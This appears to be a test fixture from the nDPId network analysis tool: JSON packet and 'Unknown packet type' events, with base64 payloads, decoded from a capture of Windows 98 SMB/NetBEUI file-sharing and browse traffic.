00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":114,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":59,"global_ts_msec":1576409872683} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":114,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":59,"global_ts_msec":1576409872683}
00390{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":115,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AAwp1HmyAFBWM3ieADXw8BYcDgD\/7xYMAAALACgAAxX\/U01CBAAAAACAAAAAAAAAAAAAAAAAAAAAyHUFAABhAQAAAA=="} 00376{"packet_event_id":1,"packet_event_name":"packet","packet_id":115,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AAwp1HmyAFBWM3ieADXw8BYcDgD\/7xYMAAALACgAAxX\/U01CBAAAAACAAAAAAAAAAAAAAAAAAAAAyHUFAABhAQAAAA=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":115,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":53,"global_ts_msec":1576409872683} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":115,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":53,"global_ts_msec":1576409872683}
00378{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":116,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":18,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AFBWM3ieAAwp1HmyABLw8BwYDgD\/7xQAAAAoAAAAFQP\/U01CgQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUF"} 00364{"packet_event_id":1,"packet_event_name":"packet","packet_id":116,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":18,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AFBWM3ieAAwp1HmyABLw8BwYDgD\/7xQAAAAoAAAAFQP\/U01CgQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUF"}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":116,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":18,"global_ts_msec":1576409872793} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":116,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":18,"global_ts_msec":1576409872793}
00376{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":117,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AAwp1HmyAFBWM3ieAATw8QEeIQAAAIARuLrAqO+BwKjv\/wCJAIkATG2mAAopEAABAAAAAAABIEZIRVBG"} 00362{"packet_event_id":1,"packet_event_name":"packet","packet_id":117,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AAwp1HmyAFBWM3ieAATw8QEeIQAAAIARuLrAqO+BwKjv\/wCJAIkATG2mAAopEAABAAAAAAABIEZIRVBG"}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":117,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409873117} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":117,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409873117}
00508{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":118,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":156,"pkt_type":142,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":156,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AwAAAAABAFBWM3ieAI7w8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAdTURKUjk4ICAgICAgICAgIP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAACQAAAAAAAAAAAAAAAAAAAAAAAAAJAFYAAwABAAEAAgAaAFxNQUlMU0xPVFxCUk9XU0UAAgBNREpSOTgA"} 00494{"packet_event_id":1,"packet_event_name":"packet","packet_id":118,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":156,"pkt_type":142,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":156,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AwAAAAABAFBWM3ieAI7w8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAdTURKUjk4ICAgICAgICAgIP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAACQAAAAAAAAAAAAAAAAAAAAAAAAAJAFYAAwABAAEAAgAaAFxNQUlMU0xPVFxCUk9XU0UAAgBNREpSOTgA"}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":118,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":142,"global_ts_msec":1576409876181} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":118,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":142,"global_ts_msec":1576409876181}
00446{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":119,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":107,"pkt_type":93,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":107,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AFBWM3ieAAwp1HmyAF3w8B4YDgD\/7xYEAAAAAAwAFQP\/U01CLQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAACBAQ\/\/AAAABwAAABYAAAAiKfZdAQAAAAAAAAAAAAAAAAAKAFxURVNULlRYVAA="} 00432{"packet_event_id":1,"packet_event_name":"packet","packet_id":119,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":107,"pkt_type":93,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":107,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AFBWM3ieAAwp1HmyAF3w8B4YDgD\/7xYEAAAAAAwAFQP\/U01CLQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAACBAQ\/\/AAAABwAAABYAAAAiKfZdAQAAAAAAAAAAAAAAAAAKAFxURVNULlRYVAA="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":119,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":93,"global_ts_msec":1576409876669} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":119,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":93,"global_ts_msec":1576409876669}
00376{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":120,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AAwp1HmyAFBWM3ieAATw8QEgIwAAAIARtrrAqO+BwKjv\/wCJAIkATG6mAAooEAABAAAAAAABIEZIRVBG"} 00362{"packet_event_id":1,"packet_event_name":"packet","packet_id":120,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AAwp1HmyAFBWM3ieAATw8QEgIwAAAIARtrrAqO+BwKjv\/wCJAIkATG6mAAooEAABAAAAAAABIEZIRVBG"}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":120,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409876669} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":120,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409876669}
00432{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":121,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":97,"pkt_type":83,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":97,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AAwp1HmyAFBWM3ieAFPw8BggDgD\/7xYMAAAMACgAAxX\/U01CLQAAAACAAAAAAAAAAAAAAAAAAAAAyHUFAACBAQ\/\/AAAAAQAgAB4p9l1kBAAAAAAAAAAAAQAAAAAAAAAAAA=="} 00418{"packet_event_id":1,"packet_event_name":"packet","packet_id":121,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":97,"pkt_type":83,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":97,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AAwp1HmyAFBWM3ieAFPw8BggDgD\/7xYMAAAMACgAAxX\/U01CLQAAAACAAAAAAAAAAAAAAAAAAAAAyHUFAACBAQ\/\/AAAAAQAgAB4p9l1kBAAAAAAAAAAAAQAAAAAAAAAAAA=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":121,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":83,"global_ts_msec":1576409876670} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":121,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":83,"global_ts_msec":1576409876670}
00402{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":122,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":73,"pkt_type":59,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":73,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AFBWM3ieAAwp1HmyADvw8CAaDgD\/7xYMAAAoAA0AFQP\/U01CBAAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAAChAQMBAP\/\/\/\/8AAA=="} 00388{"packet_event_id":1,"packet_event_name":"packet","packet_id":122,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":73,"pkt_type":59,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":73,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AFBWM3ieAAwp1HmyADvw8CAaDgD\/7xYMAAAoAA0AFQP\/U01CBAAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAAChAQMBAP\/\/\/\/8AAA=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":122,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":59,"global_ts_msec":1576409876703} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":122,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":59,"global_ts_msec":1576409876703}
00376{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":123,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AAwp1HmyAFBWM3ieAATw8QEiAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAdTURKUjk4ICAgICAgICAg"} 00362{"packet_event_id":1,"packet_event_name":"packet","packet_id":123,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AAwp1HmyAFBWM3ieAATw8QEiAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAdTURKUjk4ICAgICAgICAg"}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":123,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409876703} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":123,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409876703}
00390{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":124,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AAwp1HmyAFBWM3ieADXw8BoiDgD\/7xYMAAANACgAAxX\/U01CBAAAAACAAAAAAAAAAAAAAAAAAAAAyHUFAAChAQAAAA=="} 00376{"packet_event_id":1,"packet_event_name":"packet","packet_id":124,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AAwp1HmyAFBWM3ieADXw8BoiDgD\/7xYMAAANACgAAxX\/U01CBAAAAACAAAAAAAAAAAAAAAAAAAAAyHUFAAChAQAAAA=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":124,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":53,"global_ts_msec":1576409876703} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":124,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":53,"global_ts_msec":1576409876703}
00378{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":125,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":18,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AFBWM3ieAAwp1HmyABLw8CIcDgD\/7xQAAAAoAAAAFQP\/U01CBAAAAAAAAAAAAAAAAAAAAAAAAAAAyHUF"} 00364{"packet_event_id":1,"packet_event_name":"packet","packet_id":125,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":18,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AFBWM3ieAAwp1HmyABLw8CIcDgD\/7xQAAAAoAAAAFQP\/U01CBAAAAAAAAAAAAAAAAAAAAAAAAAAAyHUF"}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":125,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":18,"global_ts_msec":1576409876764} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":125,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":18,"global_ts_msec":1576409876764}
00376{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":126,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AAwp1HmyAFBWM3ieAATw8QEkAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAdTURKUjk4ICAgICAgICAg"} 00362{"packet_event_id":1,"packet_event_name":"packet","packet_id":126,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AAwp1HmyAFBWM3ieAATw8QEkAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAdTURKUjk4ICAgICAgICAg"}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":126,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409876771} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":126,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409876771}
00402{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":128,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":78,"pkt_type":64,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":78,"pkt_l4_len":0,"thread_ts_msec":1576409881580,"pkt":"AFBWM3ieAAwp1HmyAEDw8CQcDgD\/7xYEAAAAAA4AFQP\/U01CEAAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAADBAQALAARcVEVTVC5UWFQA"} 00388{"packet_event_id":1,"packet_event_name":"packet","packet_id":128,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":78,"pkt_type":64,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":78,"pkt_l4_len":0,"thread_ts_msec":1576409881580,"pkt":"AFBWM3ieAAwp1HmyAEDw8CQcDgD\/7xYEAAAAAA4AFQP\/U01CEAAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAADBAQALAARcVEVTVC5UWFQA"}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":128,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":64,"global_ts_msec":1576409882997} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":128,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":64,"global_ts_msec":1576409882997}
00390{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":129,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":1576409881580,"pkt":"AAwp1HmyAFBWM3ieADXw8BwmDgD\/7xYMAAAOACgAAxX\/U01CEAEAAwCAAAAAAAAAAAAAAAAAAAAAyHUFAADBAQAAAA=="} 00376{"packet_event_id":1,"packet_event_name":"packet","packet_id":129,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":1576409881580,"pkt":"AAwp1HmyAFBWM3ieADXw8BwmDgD\/7xYMAAAOACgAAxX\/U01CEAEAAwCAAAAAAAAAAAAAAAAAAAAAyHUFAADBAQAAAA=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":129,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":53,"global_ts_msec":1576409882997} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":129,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":53,"global_ts_msec":1576409882997}
00406{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":130,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":80,"pkt_type":66,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":80,"pkt_l4_len":0,"thread_ts_msec":1576409881580,"pkt":"AFBWM3ieAAwp1HmyAELw8CYeDgD\/7xYMAAAoAA8AFQP\/U01CBgAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAADhAQEAAAsABFxURVNULlRYVAA="} 00392{"packet_event_id":1,"packet_event_name":"packet","packet_id":130,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":80,"pkt_type":66,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":80,"pkt_l4_len":0,"thread_ts_msec":1576409881580,"pkt":"AFBWM3ieAAwp1HmyAELw8CYeDgD\/7xYMAAAoAA8AFQP\/U01CBgAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAADhAQEAAAsABFxURVNULlRYVAA="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":130,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":66,"global_ts_msec":1576409882997} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":130,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":66,"global_ts_msec":1576409882997}
00390{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":131,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":1576409881580,"pkt":"AAwp1HmyAFBWM3ieADXw8B4oDgD\/7xYMAAAPACgAAxX\/U01CBgAAAACAAAAAAAAAAAAAAAAAAAAAyHUFAADhAQAAAA=="} 00376{"packet_event_id":1,"packet_event_name":"packet","packet_id":131,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":1576409881580,"pkt":"AAwp1HmyAFBWM3ieADXw8B4oDgD\/7xYMAAAPACgAAxX\/U01CBgAAAACAAAAAAAAAAAAAAAAAAAAAyHUFAADhAQAAAA=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":131,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":53,"global_ts_msec":1576409882997} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":131,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":53,"global_ts_msec":1576409882997}
00378{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":132,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":18,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409881580,"pkt":"AFBWM3ieAAwp1HmyABLw8CggDgD\/7xQAAAAoAAAAFQP\/U01CBAAAAAAAAAAAAAAAAAAAAAAAAAAAyHUF"} 00364{"packet_event_id":1,"packet_event_name":"packet","packet_id":132,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":18,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409881580,"pkt":"AFBWM3ieAAwp1HmyABLw8CggDgD\/7xQAAAAoAAAAFQP\/U01CBAAAAAAAAAAAAAAAAAAAAAAAAAAAyHUF"}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":132,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":18,"global_ts_msec":1576409883083} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":132,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":18,"global_ts_msec":1576409883083}
00376{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":133,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409881580,"pkt":"AAwp1HmyAFBWM3ieAATw8QEqDgD\/7xeBvAUDABUAAxXvAgCJAIkATAvHAAQpAAABAAAAAAABIEVORUVF"} 00362{"packet_event_id":1,"packet_event_name":"packet","packet_id":133,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409881580,"pkt":"AAwp1HmyAFBWM3ieAATw8QEqDgD\/7xeBvAUDABUAAxXvAgCJAIkATAvHAAQpAAABAAAAAAABIEVORUVF"}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":133,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409883461} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":133,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409883461}
00524{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":134,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":168,"pkt_type":154,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":168,"pkt_l4_len":0,"thread_ts_msec":1576409881580,"pkt":"AwAAAAABAFBWM3ieAJrw8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAeTURKUjk4ICAgICAgICAgIP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAFQAAAAAAAAAAAAAAAAAAAAAAAAAVAFYAAwABAAEAAgAmAFxNQUlMU0xPVFxCUk9XU0UACAEAAAAAAAAAAAAAAABNREpSOTgA"} 00510{"packet_event_id":1,"packet_event_name":"packet","packet_id":134,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":168,"pkt_type":154,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":168,"pkt_l4_len":0,"thread_ts_msec":1576409881580,"pkt":"AwAAAAABAFBWM3ieAJrw8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAeTURKUjk4ICAgICAgICAgIP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAFQAAAAAAAAAAAAAAAAAAAAAAAAAVAFYAAwABAAEAAgAmAFxNQUlMU0xPVFxCUk9XU0UACAEAAAAAAAAAAAAAAABNREpSOTgA"}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":134,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":154,"global_ts_msec":1576409886201} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":134,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":154,"global_ts_msec":1576409886201}
